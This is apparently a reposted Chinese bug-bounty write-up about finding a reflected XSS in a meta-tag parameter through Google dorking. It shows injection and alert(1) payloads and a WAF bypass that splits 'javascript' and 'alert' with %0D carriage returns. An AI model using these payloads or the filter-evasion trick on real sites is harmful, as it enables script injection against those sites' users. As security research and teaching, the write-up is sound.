正文部分
原作者:https://medium.com/@Thigh_GoD
信息收集
使用 Google 语法进行信息收集
这里推荐一个网站,他设置好了一些常见的语法,可以让你更快的发现比较敏感的资产
https://taksec.github.io/google-dorks-bug-bounty/
输入想要寻找的域名,点击就会自动填充Google语法
XSS注入
通过这个方式发现了目标资产的一个历史路径example.php
通过 Ctrl + U 发现了meta标签,并且没有过滤掉"/>,而且其可以通过参数t传参设置
?t=somethingsomethingsomething&p=”/><a href=testing>THIS IS AN INJECTED HTML LINK</a>”&s=something
网站正常解析:
尝试使用常见的poc <script>alert(1)</script>``<img src=x onerror=alert(1)>``JavaScript
,发现存在waf
使用换行bypass waf
通过拦截的关键词,发现这个 WAF 是将 javascript 和 alert 等关键字列入黑名单。
这时候就可以使用 %0D
换行符来进行混淆,
在HTML中其可以正常解析,
<a href="javascript:alert(1)">
但是在waf中他可能就无法正常识别
<a href="ja%0Dva%0Dscr%0Dipt:aler%0Dt(1)">
<a href="ja
va
scr
ipt:aler
t(1)">
成功触发xss
原文始发于微信公众号(fkalis):【海外SRC漏洞挖掘】谷歌语法发现XSS+Waf Bypass
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论